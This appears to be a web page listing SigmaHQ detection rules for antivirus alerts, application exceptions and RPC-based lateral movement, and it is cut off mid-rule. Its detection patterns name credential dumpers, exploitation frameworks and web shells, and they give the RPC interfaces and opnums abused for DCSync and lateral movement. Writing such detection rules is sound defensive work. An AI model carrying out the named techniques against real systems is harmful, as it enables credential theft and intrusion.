SigmaHQ/sigma/rules

application

antivirus

Antivirus Exploitation Framework Detection

  1. title: Antivirus Exploitation Framework Detection
  2. id: 238527ad-3c2c-4e4f-a1f6-92fd63adb864
  3. status: test
  4. description: Detects a highly relevant Antivirus alert that reports an exploitation framework
  5. author: Florian Roth
  6. references:
  7. - https://www.nextron-systems.com/2018/09/08/antivirus-event-analysis-cheat-sheet-v1-4/
  8. date: 2018/09/09
  9. modified: 2021/11/27
  10. logsource:
  11. product: antivirus
  12. detection:
  13. selection:
  14. Signature|contains:
  15. - 'MeteTool'
  16. - 'MPreter'
  17. - 'Meterpreter'
  18. - 'Metasploit'
  19. - 'PowerSploit'
  20. - 'CobaltStrike'
  21. - 'Swrort'
  22. - 'Rozena'
  23. - 'Backdoor.Cobalt'
  24. - 'CobaltStr'
  25. - 'COBEACON'
  26. - 'Cometer'
  27. - 'Razy'
  28. condition: selection
  29. fields:
  30. - FileName
  31. - User
  32. falsepositives:
  33. - Unlikely
  34. level: critical
  35. tags:
  36. - attack.execution
  37. - attack.t1203
  38. - attack.command_and_control
  39. - attack.t1219

Antivirus Hacktool Detection

  1. title: Antivirus Hacktool Detection
  2. id: fa0c05b6-8ad3-468d-8231-c1cbccb64fba
  3. description: Detects a highly relevant Antivirus alert that reports a hack tool or other attack tool
  4. status: experimental
  5. date: 2021/08/16
  6. author: Florian Roth
  7. references:
  8.     - https://www.nextron-systems.com/2021/08/16/antivirus-event-analysis-cheat-sheet-v1-8-2/
  9. logsource:
  10.     product: antivirus
  11. detection:
  12.     selection:
  13.         - Signature|startswith:
  14.             - 'HTOOL'
  15.             - 'HKTL'
  16.             - 'SecurityTool'
  17.             - 'ATK/'  # Sophos
  18.         - Signature|contains:
  19.             - 'Hacktool'
  20.     condition: selection
  21. fields:
  22.     - FileName
  23.     - User
  24. falsepositives:
  25.     - Unlikely
  26. level: high
  27. tags:
  28.     - attack.execution
  29.     - attack.t1204

Antivirus Password Dumper Detection

  1. title: Antivirus Password Dumper Detection
  2. id: 78cc2dd2-7d20-4d32-93ff-057084c38b93
  3. status: test
  4. description: Detects a highly relevant Antivirus alert that reports a password dumper
  5. author: Florian Roth
  6. references:
  7.   - https://www.nextron-systems.com/2018/09/08/antivirus-event-analysis-cheat-sheet-v1-4/
  8.   - https://www.virustotal.com/gui/file/5fcda49ee7f202559a6cbbb34edb65c33c9a1e0bde9fa2af06a6f11b55ded619/detection
  9. date: 2018/09/09
  10. modified: 2021/11/27
  11. logsource:
  12.   product: antivirus
  13. detection:
  14.   selection:
  15.     Signature|contains:
  16.       - 'DumpCreds'
  17.       - 'Mimikatz'
  18.       - 'PWCrack'
  19.       - 'HTool/WCE'
  20.       - 'PSWtool'
  21.       - 'PWDump'
  22.       - 'SecurityTool'
  23.       - 'PShlSpy'
  24.       - 'Rubeus'
  25.       - 'Kekeo'
  26.       - 'LsassDump'
  27.       - 'Outflank'
  28.   condition: selection
  29. fields:
  30.   - FileName
  31.   - User
  32. falsepositives:
  33.   - Unlikely
  34. level: critical
  35. tags:
  36.   - attack.credential_access
  37.   - attack.t1003
  38.   - attack.t1558
  39.   - attack.t1003.001
  40.   - attack.t1003.002

Antivirus PrinterNightmare CVE-2021-34527 Exploit Detection

  1. title: Antivirus PrinterNightmare CVE-2021-34527 Exploit Detection
  2. id: 6fe1719e-ecdf-4caf-bffe-4f501cb0a561
  3. status: stable
  4. description: Detects the suspicious file that is created from PoC code against Windows Print Spooler Remote Code Execution Vulnerability CVE-2021-34527 (PrinterNightmare), CVE-2021-1675 .
  5. references:
  6.     - https://twitter.com/mvelazco/status/1410291741241102338
  7.     - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675
  8.     - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527
  9. author: Sittikorn S, Nuttakorn T
  10. date: 2021/07/01
  11. modified: 2021/11/23
  12. tags:
  13.     - attack.privilege_escalation
  14.     - attack.t1055
  15. logsource:
  16.     product: antivirus
  17. detection:
  18.     selection:
  19.         Filename|contains: 'C:\Windows\System32\spool\drivers\x64\'
  20.     condition: selection
  21. fields:
  22.     - Signature
  23.     - Filename
  24.     - ComputerName
  25. falsepositives:
  26.     - Unlikely
  27. level: critical

Antivirus Relevant File Paths Alerts

  1. title: Antivirus Relevant File Paths Alerts
  2. id: c9a88268-0047-4824-ba6e-4d81ce0b907c
  3. description: Detects an Antivirus alert in a highly relevant file path or with a relevant file name
  4. status: experimental
  5. date: 2018/09/09
  6. modified: 2021/11/23
  7. author: Florian Roth, Arnim Rupp
  8. references:
  9.     - https://www.nextron-systems.com/2021/03/25/antivirus-event-analysis-cheat-sheet-v1-8/
  10. logsource:
  11.     product: antivirus
  12. detection:
  13.     selection:
  14.         - Filename|startswith:
  15.             - 'C:\Windows\'
  16.             - 'C:\Temp\'
  17.             - 'C:\PerfLogs\'
  18.             - 'C:\Users\Public\'
  19.             - 'C:\Users\Default\'
  20.         - Filename|contains:
  21.             - '\Client\'
  22.             - '\tsclient\'
  23.             - '\inetpub\'
  24.             - '/www/'
  25.             - 'apache'
  26.             - 'tomcat'
  27.             - 'nginx'
  28.             - 'weblogic'
  29.     selection2:
  30.         Filename|endswith:
  31.             - '.ps1'
  32.             - '.psm1'
  33.             - '.vbs'
  34.             - '.bat'
  35.             - '.cmd'
  36.             - '.sh'
  37.             - '.chm'
  38.             - '.xml'
  39.             - '.txt'
  40.             - '.jsp'
  41.             - '.jspx'
  42.             - '.asp'
  43.             - '.aspx'
  44.             - '.ashx'
  45.             - '.asax'
  46.             - '.asmx'
  47.             - '.php'
  48.             - '.cfm'
  49.             - '.py'
  50.             - '.pyc'
  51.             - '.pl'
  52.             - '.rb'
  53.             - '.cgi'
  54.             - '.war'
  55.             - '.ear'
  56.             - '.hta'
  57.             - '.lnk'
  58.             - '.scf'
  59.             - '.sct'
  60.             - '.vbe'
  61.             - '.wsf'
  62.             - '.wsh'
  63.             - '.gif'
  64.             - '.png'
  65.             - '.jpg'
  66.             - '.jpeg'
  67.             - '.svg'
  68.             - '.dat'
  69.     condition: selection or selection2
  70. fields:
  71.     - Signature
  72.     - User
  73. falsepositives:
  74.     - Unlikely
  75. level: high
  76. tags:
  77.     - attack.resource_development
  78.     - attack.t1588

Antivirus Web Shell Detection

  1. title: Antivirus Web Shell Detection
  2. id: fdf135a2-9241-4f96-a114-bb404948f736
  3. description: Detects a highly relevant Antivirus alert that reports a web shell. It's highly recommended to tune this rule to the specific strings used by your anti virus solution by downloading a big webshell repo from e.g. github and checking the matches.
  4. status: experimental
  5. date: 2018/09/09
  6. modified: 2021/05/08
  7. author: Florian Roth, Arnim Rupp
  8. references:
  9.     - https://www.nextron-systems.com/2021/03/25/antivirus-event-analysis-cheat-sheet-v1-8/
  10.     - https://github.com/tennc/webshell
  11.     - https://www.virustotal.com/gui/file/bd1d52289203866645e556e2766a21d2275877fbafa056a76fe0cf884b7f8819/detection
  12.     - https://www.virustotal.com/gui/file/308487ed28a3d9abc1fec7ebc812d4b5c07ab025037535421f64c60d3887a3e8/detection
  13.     - https://www.virustotal.com/gui/file/7d3cb8a8ff28f82b07f382789247329ad2d7782a72dde9867941f13266310c80/detection
  14.     - https://www.virustotal.com/gui/file/e841675a4b82250c75273ebf0861245f80c6a1c3d5803c2d995d9d3b18d5c4b5/detection
  15.     - https://www.virustotal.com/gui/file/a80042c61a0372eaa0c2c1e831adf0d13ef09feaf71d1d20b216156269045801/detection
  16.     - https://www.virustotal.com/gui/file/b219f7d3c26f8bad7e175934cd5eda4ddb5e3983503e94ff07d39c0666821b7e/detection
  17.     - https://www.virustotal.com/gui/file/b8702acf32fd651af9f809ed42d15135f842788cd98d81a8e1b154ee2a2b76a2/detection
  18. tags:
  19.     - attack.persistence
  20.     - attack.t1505.003
  21. logsource:
  22.     product: antivirus
  23. detection:
  24.     selection:
  25.         - Signature|startswith:
  26.             - 'PHP/'
  27.             - 'JSP/'
  28.             - 'ASP/'
  29.             - 'Perl/'
  30.             - 'PHP.'
  31.             - 'JSP.'
  32.             - 'ASP.'
  33.             - 'Perl.'
  34.             - 'VBS/Uxor' # looking for 'VBS/' would also find downloaders and droppers meant for desktops
  35.             - 'IIS/BackDoor'
  36.             - 'JAVA/Backdoor'
  37.             - 'Troj/ASP'
  38.             - 'Troj/PHP'
  39.             - 'Troj/JSP'
  40.         - Signature|contains:
  41.             - 'Webshell'
  42.             - 'Chopper'
  43.             - 'SinoChoper'
  44.             - 'ASPXSpy'
  45.             - 'Aspdoor'
  46.             - 'filebrowser'
  47.             - 'PHP_'
  48.             - 'JSP_'
  49.             - 'ASP_' # looking for 'VBS_' would also find downloaders and droppers meant for desktops
  50.             - 'PHP:'
  51.             - 'JSP:'
  52.             - 'ASP:'
  53.             - 'Perl:'
  54.             - 'PHPShell'
  55.             - 'Trojan.PHP'
  56.             - 'Trojan.ASP'
  57.             - 'Trojan.JSP'
  58.             - 'Trojan.VBS'
  59.             - 'PHP?Agent'
  60.             - 'ASP?Agent'
  61.             - 'JSP?Agent'
  62.             - 'VBS?Agent'
  63.             - 'Backdoor?PHP'
  64.             - 'Backdoor?JSP'
  65.             - 'Backdoor?ASP'
  66.             - 'Backdoor?VBS'
  67.             - 'Backdoor?Java'
  68.     condition: selection
  69. fields:
  70.     - FileName
  71.     - User
  72. falsepositives:
  73.     - Unlikely
  74. level: critical

django

Django Framework Exceptions

  1. title: Django Framework Exceptions
  2. id: fd435618-981e-4a7c-81f8-f78ce480d616
  3. status: stable
  4. description: Detects suspicious Django web application framework exceptions that could indicate exploitation attempts
  5. author: Thomas Patzke
  6. date: 2017/08/05
  7. modified: 2020/09/01
  8. references:
  9.     - https://docs.djangoproject.com/en/1.11/ref/exceptions/
  10.     - https://docs.djangoproject.com/en/1.11/topics/logging/#django-security
  11. logsource:
  12.     category: application
  13.     product: django
  14. detection:
  15.     keywords:
  16.         - SuspiciousOperation
  17.         # Subclasses of SuspiciousOperation
  18.         - DisallowedHost
  19.         - DisallowedModelAdminLookup
  20.         - DisallowedModelAdminToField
  21.         - DisallowedRedirect
  22.         - InvalidSessionKey
  23.         - RequestDataTooBig
  24.         - SuspiciousFileOperation
  25.         - SuspiciousMultipartForm
  26.         - SuspiciousSession
  27.         - TooManyFieldsSent
  28.         # Further security-related exceptions
  29.         - PermissionDenied
  30.     condition: keywords
  31. falsepositives:
  32.     - Application bugs
  33.     - Penetration testing
  34. level: medium
  35. tags:
  36.     - attack.initial_access
  37.     - attack.t1190

edr/windows

EDR WMI Command Execution by Office Applications

  1. title: EDR WMI Command Execution by Office Applications
  2. id: 3ee1bba8-b9e2-4e35-bec5-7fb66b6b3815
  3. description: Initial execution of malicious document calls wmic Win32_Process::Create to execute the file with regsvr32
  4. references:
  5.     - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/
  6.     - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml
  7. author: 'Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)'
  8. tags:
  9.     - attack.t1204.002
  10.     - attack.t1047
  11.     - attack.t1218.010
  12.     - attack.execution
  13.     - attack.defense_evasion
  14. status: experimental
  15. date: 2021/08/23
  16. modified: 2021/11/09
  17. logsource:
  18.   product: windows
  19.   category: edr
  20. detection:
  21.   #useful_information: Add more office applications to the rule logic of choice
  22.   selection1:
  23.     EventLog: EDR
  24.     EventType: WMIExecution
  25.     WMIcommand|contains: 'Win32_Process\:\:Create'
  26.   selection2:
  27.     Image|endswith:
  28.       - '\winword.exe'
  29.       - '\excel.exe'
  30.       - '\powerpnt.exe'
  31.   condition: selection1 and selection2
  32. falsepositives:
  33. - Unknown
  34. level: high

python

Python SQL Exceptions

  1. title: Python SQL Exceptions
  2. id: 19aefed0-ffd4-47dc-a7fc-f8b1425e84f9
  3. status: stable
  4. description: Generic rule for SQL exceptions in Python according to PEP 249
  5. author: Thomas Patzke
  6. date: 2017/08/12
  7. modified: 2020/09/01
  8. references:
  9.     - https://www.python.org/dev/peps/pep-0249/#exceptions
  10. logsource:
  11.     category: application
  12.     product: python
  13. detection:
  14.     exceptions:
  15.         - DataError
  16.         - IntegrityError
  17.         - ProgrammingError
  18.         - OperationalError
  19.     condition: exceptions
  20. falsepositives:
  21.     - Application bugs
  22.     - Penetration testing
  23. level: medium
  24. tags:
  25.     - attack.initial_access
  26.     - attack.t1190

rpc_firewall

Remote Schedule Task Lateral Movement via ATSvc

  1. title: Remote Schedule Task Lateral Movement via ATSvc
  2. id: 0fcd1c79-4eeb-4746-aba9-1b458f7a79cb
  3. description: Detects remote RPC calls to create or execute a scheduled task via ATSvc
  4. references:
  5.     - https://attack.mitre.org/techniques/T1053/
  6.     - https://attack.mitre.org/tactics/TA0008/
  7.     - https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931
  8.     - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/main/documents/MS-TSCH.md
  9.     - https://github.com/zeronetworks/rpcfirewall
  10.     - https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/
  11. tags:
  12.     - attack.lateral_movement
  13.     - attack.t1053
  14.     - attack.t1053.002
  15. status: experimental
  16. author: Sagie Dulce, Dekel Paz
  17. date: 2022/01/01
  18. modified: 2022/01/01
  19. logsource:
  20.     product: rpc_firewall
  21.     category: application
  22.     definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:1ff70682-0a51-30e8-076d-740be8cee98b"'
  23. detection:
  24.     selection:
  25.         EventLog: RPCFW
  26.         EventID: 3
  27.         InterfaceUuid: 1ff70682-0a51-30e8-076d-740be8cee98b
  28.         OpNum:
  29.           - 0
  30.           - 1
  31.     condition: selection
  32. falsepositives:
  33.     - unknown
  34. level: high

Remote Schedule Task Recon via AtScv

  2. title: Remote Schedule Task Recon via AtScv
  3. id: f177f2bc-5f3e-4453-b599-57eefce9a59c
  4. description: Detects remote RPC calls to read information about scheduled tasks via AtScv
  5. references:
  6.     - https://attack.mitre.org/tactics/TA0007/
  7.     - https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931
  8.     - https://github.com/zeronetworks/rpcfirewall
  9.     - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/main/documents/MS-TSCH.md
  10.     - https://github.com/zeronetworks/rpcfirewall
  11.     - https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/
  12. status: experimental
  13. author: Sagie Dulce, Dekel Paz
  14. date: 2022/01/01
  15. modified: 2022/01/01
  16. logsource:
  17.     product: rpc_firewall
  18.     category: application
  19.     definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:1ff70682-0a51-30e8-076d-740be8cee98b"'
  20. detection:
  21.     selection:
  22.         EventLog: RPCFW
  23.         EventID: 3
  24.         InterfaceUuid: 1ff70682-0a51-30e8-076d-740be8cee98b
  25.     filter:
  26.       OpNum:
  27.         - 0
  28.         - 1
  29.     condition: selection and not filter
  30. falsepositives:
  31.     - unknown
  32. level: high

Possible DCSync Attack

  1. title: Possible DCSync Attack
  2. id: 56fda488-113e-4ce9-8076-afc2457922c3
  3. description: Detects remote RPC calls to MS-DRSR from non DC hosts, which could indicate DCSync / DCShadow attacks.
  4. references:
  5.     - https://attack.mitre.org/techniques/T1033/
  6.     - https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-drsr/f977faaa-673e-4f66-b9bf-48c640241d47?redirectedfrom=MSDN
  7.     - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/main/documents/MS-DRSR.md
  8.     - https://github.com/zeronetworks/rpcfirewall
  9.     - https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/
  10. tags:
  11.     - attack.t1033
  12. status: experimental
  13. author: Sagie Dulce, Dekel Paz
  14. date: 2022/01/01
  15. modified: 2022/01/01
  16. logsource:
  17.     product: rpc_firewall
  18.     category: application
  19.     definition: 'Requirements: install and apply the RPC Firewall to all processes, enable DRSR UUID (e3514235-4b06-11d1-ab04-00c04fc2dcd2) for "dangerous" opcodes (not 0,1 or 12) only from trusted IPs (DCs)'
  20. detection:
  21.     selection:
  22.         EventLog: RPCFW
  23.         EventID: 3
  24.         InterfaceUuid: e3514235-4b06-11d1-ab04-00c04fc2dcd2
  25.     filter:
  26.       OpNum:
  27.         - 0
  28.         - 1
  29.         - 12
  30.     condition: selection and not filter
  31. falsepositives:
  32.     - Unknown
  33. level: high

Remote Encrypting File System Abuse

  1. title: Remote Encrypting File System Abuse
  2. id: 5f92fff9-82e2-48eb-8fc1-8b133556a551
  3. description: Detects remote RPC calls to possibly abuse remote encryption service via MS-EFSR
  4. references:
  5.     - https://attack.mitre.org/tactics/TA0008/
  6.     - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942
  7.     - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/main/documents/MS-EFSR.md
  8.     - https://github.com/zeronetworks/rpcfirewall
  9.     - https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/
  10. tags:
  11.     - attack.lateral_movement
  12. status: experimental
  13. author: Sagie Dulce, Dekel Paz
  14. date: 2022/01/01
  15. modified: 2022/01/01
  16. logsource:
  17.     product: rpc_firewall
  18.     category: application
  19.     definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:df1941c5-fe89-4e79-bf10-463657acf44d or c681d488-d850-11d0-8c52-00c04fd90f7e'
  20. detection:
  21.     selection:
  22.         EventLog: RPCFW
  23.         EventID: 3
  24.         InterfaceUuid:
  25.           - df1941c5-fe89-4e79-bf10-463657acf44d
  26.           - c681d488-d850-11d0-8c52-00c04fd90f7e
  27.     condition: selection
  28. falsepositives:
  29.     - Legitimate usage of remote file encryption
  30. level: high

Remote Event Log Recon

  1. title: Remote Event Log Recon
  2. id: 2053961f-44c7-4a64-b62d-f6e72800af0d
  3. description: Detects remote RPC calls to get event log information via EVEN or EVEN6
  4. references:
  5.     - https://attack.mitre.org/tactics/TA0007/
  6.     - https://github.com/zeronetworks/rpcfirewall
  7.     - https://github.com/zeronetworks/rpcfirewall
  8.     - https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/
  9. status: experimental
  10. author: Sagie Dulce, Dekel Paz
  11. date: 2022/01/01
  12. modified: 2022/01/01
  13. logsource:
  14.     product: rpc_firewall
  15.     category: application
  16.     definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:82273fdc-e32a-18c3-3f78-827929dc23ea and uuid:f6beaff7-1e19-4fbb-9f8f-b89e2018337c"'
  17. detection:
  18.     selection:
  19.         EventLog: RPCFW
  20.         EventID: 3
  21.         InterfaceUuid:
  22.           - 82273fdc-e32a-18c3-3f78-827929dc23ea
  23.           - f6beaff7-1e19-4fbb-9f8f-b89e2018337c
  24.     condition: selection
  25. falsepositives:
  26.     - remote administrative tasks on Windows Events
  27. level: high

Remote Schedule Task Lateral Movement via ITaskSchedulerService

  1. title: Remote Schedule Task Lateral Movement via ITaskSchedulerService
  2. id: ace3ff54-e7fd-46bd-8ea0-74b49a0aca1d
  3. description: Detects remote RPC calls to create or execute a scheduled task
  4. references:
  5.     - https://attack.mitre.org/techniques/T1053/
  6.     - https://attack.mitre.org/tactics/TA0008/
  7.     - https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931
  8.     - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/main/documents/MS-TSCH.md
  9.     - https://github.com/zeronetworks/rpcfirewall
  10.     - https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/
  11. tags:
  12.     - attack.lateral_movement
  13.     - attack.t1053
  14.     - attack.t1053.002
  15. status: experimental
  16. author: Sagie Dulce, Dekel Paz
  17. date: 2022/01/01
  18. modified: 2022/01/01
  19. logsource:
  20.     product: rpc_firewall
  21.     category: application
  22.     definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:86d35949-83c9-4044-b424-db363231fd0c"'
  24. detection:
  25.     selection:
  26.         EventLog: RPCFW
  27.         EventID: 3
  28.         InterfaceUuid: 86d35949-83c9-4044-b424-db363231fd0c
  29.         OpNum:
  30.           - 1
  31.           - 3
  32.           - 4
  33.           - 10
  34.           - 11
  35.           - 12
  36.           - 13
  37.           - 14
  38.           - 15
  39.     condition: selection
  40. falsepositives:
  41.     - unknown
  42. level: high

Remote Schedule Task Recon via ITaskSchedulerService

  1. title: Remote Schedule Task Recon via ITaskSchedulerService
  2. id: 7f7c49eb-2977-4ac8-8ab0-ab1bae14730e
  3. description: Detects remote RPC calls to read information about scheduled tasks
  4. references:
  5.     - https://attack.mitre.org/tactics/TA0007/
  6.     - https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931
  7.     - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/main/documents/MS-TSCH.md
  8.     - https://github.com/zeronetworks/rpcfirewall
  9.     - https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/
  10. status: experimental
  11. author: Sagie Dulce, Dekel Paz
  12. date: 2022/01/01
  13. modified: 2022/01/01
  14. logsource:
  15.     product: rpc_firewall
  16.     category: application
  17.     definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:86d35949-83c9-4044-b424-db363231fd0c"'
  18. detection:
  19.     selection:
  20.         EventLog: RPCFW
  21.         EventID: 3
  22.         InterfaceUuid: 86d35949-83c9-4044-b424-db363231fd0c
  23.     filter:
  24.       OpNum:
  25.         - 1
  26.         - 3
  27.         - 4
  28.         - 10
  29.         - 11
  30.         - 12
  31.         - 13
  32.         - 14
  33.         - 15
  34.     condition: selection and not filter
  35. falsepositives:
  36.     - unknown
  37. level: high

Remote Printing Abuse for Lateral Movement

  1. title: Remote Printing Abuse for Lateral Movement
  2. id: bc3a4b0c-e167-48e1-aa88-b3020950e560
  3. description: Detects remote RPC calls to possibly abuse remote printing service via MS-RPRN / MS-PAR
  4. references:
  5.     - https://attack.mitre.org/tactics/TA0008/
  6.     - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527
  7.     - https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/d42db7d5-f141-4466-8f47-0a4be14e2fc1
  8.     - https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-pan/e44d984c-07d3-414c-8ffc-f8c8ad8512a8
  9.     - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/main/documents/MS-RPRN-PAR.md
  10.     - https://github.com/zeronetworks/rpcfirewall
  11.     - https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/
  12. tags:
  13.     - attack.lateral_movement
  14. status: experimental
  15. author: Sagie Dulce, Dekel Paz
  16. date: 2022/01/01
  17. modified: 2022/01/01
  18. logsource:
  19.     product: rpc_firewall
  20.     category: application
  21.     definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:12345678-1234-abcd-ef00-0123456789ab or 76f03f96-cdfd-44fc-a22c-64950a001209 or ae33069b-a2a8-46ee-a235-ddfd339be281 or 0b6edbfa-4a24-4fc6-8a23-942b1eca65d1'
  22. detection:
  23.     selection:
  24.         EventLog: RPCFW
  25.         EventID: 3
  26.         InterfaceUuid:
  27.           - 12345678-1234-abcd-ef00-0123456789ab
  28.           - 76f03f96-cdfd-44fc-a22c-64950a001209
  29.           - 0b6edbfa-4a24-4fc6-8a23-942b1eca65d1
  30.           - ae33069b-a2a8-46ee-a235-ddfd339be281
  31.     condition: selection
  32. falsepositives:
  33.     - actual printing
  34. level: high

Remote DCOM/WMI Lateral Movement

  1. title: Remote DCOM/WMI Lateral Movement
  2. id: 68050b10-e477-4377-a99b-3721b422d6ef
  3. description: Detects remote RPC calls that performs remote DCOM operations. These could be abused for lateral movement via DCOM or WMI.
  4. references:
  5.     - https://attack.mitre.org/tactics/TA0008/
  6.     - https://attack.mitre.org/techniques/T1021/003/
  7.     - https://attack.mitre.org/techniques/T1047/
  8.     - https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9
  9.     - https://github.com/zeronetworks/rpcfirewall
  10.     - https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/
  11. tags:
  12.     - attack.lateral_movement
  13.     - attack.t1021.003
  14.     - attack.t1047
  15. status: experimental
  16. author: Sagie Dulce, Dekel Paz
  17. date: 2022/01/01
  18. modified: 2022/01/01
  19. logsource:
  20.     product: rpc_firewall
  21.     category: application
  22.     definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:367abb81-9844-35f1-ad32-98f038001003'
  23. detection:
  24.     selection:
  25.         EventLog: RPCFW
  26.         EventID: 3
  27.         InterfaceUuid:
  28.           - 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57
  29.           - 99fcfec4-5260-101b-bbcb-00aa0021347a
  30.           - 000001a0-0000-0000-c000-000000000046
  31.           - 00000131-0000-0000-c000-000000000046
  32.           - 00000143-0000-0000-c000-000000000046
  33.           - 00000000-0000-0000-c000-000000000046
  34.     condition: selection
  35. falsepositives:
  36.     - Some administrative tasks on remote host
  37. level: high

Remote Registry Lateral Movement

  1. title: Remote Registry Lateral Movement
  2. id: 35c55673-84ca-4e99-8d09-e334f3c29539
  3. description: Detects remote RPC calls to modify the registry and possible execute code
  4. references:
  5.     - https://attack.mitre.org/techniques/T1112/
  6.     - https://attack.mitre.org/tactics/TA0008/
  7.     - https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78
  8.     - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/main/documents/MS-RRP.md
  9.     - https://github.com/zeronetworks/rpcfirewall
  10.     - https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/
  11. tags:
  12.     - attack.lateral_movement
  13. status: experimental
  14. author: Sagie Dulce, Dekel Paz
  15. date: 2022/01/01
  16. modified: 2022/01/01
  17. logsource:
  18.     product: rpc_firewall
  19.     category: application
  20.     definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:338cd001-2244-31f1-aaaa-900038001003"'
  21. detection:
  22.     selection:
  23.         EventLog: RPCFW
  24.         EventID: 3
  25.         InterfaceUuid: 338cd001-2244-31f1-aaaa-900038001003
  26.         OpNum:
  27.           - 6
  28.           - 7
  29.           - 8
  30.           - 13
  31.           - 18
  32.           - 19
  33.           - 21
  34.           - 22
  35.           - 23
  36.           - 35
  37.     condition: selection
  38. falsepositives:
  39.     - Remote administration of registry values
  40. level: high

Remote Registry Recon

  1. title: Remote Registry Recon
  2. id: d8ffe17e-04be-4886-beb9-c1dd1944b9a8
  3. description: Detects remote RPC calls to collect information
  4. references:
  5.     - https://attack.mitre.org/tactics/TA0007/
  6.     - https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78
  7.     - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/main/documents/MS-RRP.md
  8.     - https://github.com/zeronetworks/rpcfirewall
  9.     - https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/
  10. status: experimental
  11. author: Sagie Dulce, Dekel Paz
  12. date: 2022/01/01
  13. modified: 2022/01/01
  14. logsource:
  15.     product: rpc_firewall
  16.     category: application
  17.     definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:338cd001-2244-31f1-aaaa-900038001003"'
  18. detection:
  19.     selection:
  20.         EventLog: RPCFW
  21.         EventID: 3
  22.         InterfaceUuid: 338cd001-2244-31f1-aaaa-900038001003
  23.     filter:
  24.       OpNum:
  25.         - 6
  26.         - 7
  27.         - 8
  28.         - 13
  29.         - 18
  30.         - 19
  31.         - 21
  32.         - 22
  33.         - 23
  34.         - 35
  35.     condition: selection and not filter
  36. falsepositives:
  37.     - Remote administration of registry values
  38. level: high

Remote Server Service Abuse

  1. title: Remote Server Service Abuse
  2. id: b6ea3cc7-542f-43ef-bbe4-980fbed444c7
  3. description: Detects remote RPC calls to possibly abuse remote encryption service via MS-SRVS
  4. references:
  5.     - https://attack.mitre.org/tactics/TA0008/
  6.     - https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9
  7.     - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/main/documents/MS-SRVS.md
  8.     - https://github.com/zeronetworks/rpcfirewall
  9.     - https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/
  10. tags:
  11.     - attack.lateral_movement
  12. status: experimental
  13. author: Sagie Dulce, Dekel Paz
  14. date: 2022/01/01
  15. modified: 2022/01/01
  16. logsource:
  17.     product: rpc_firewall
  18.     category: application
  19.     definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:4b324fc8-1670-01d3-1278-5a47bf6ee188'
  20. detection:
  21.     selection:
  22.         EventLog: RPCFW
  23.         EventID: 3
  24.         InterfaceUuid: 4b324fc8-1670-01d3-1278-5a47bf6ee188
  25.     condition: selection
  26. falsepositives:
  27.     - Legitimate remote share creation
  28. level: high

Remote Server Service Abuse for Lateral Movement

  1. title: Remote Server Service Abuse for Lateral Movement
  2. id: 10018e73-06ec-46ec-8107-9172f1e04ff2
  3. description: Detects remote RPC calls to possibly abuse remote encryption service via MS-EFSR
  4. references:
  5.     - https://attack.mitre.org/tactics/TA0008/
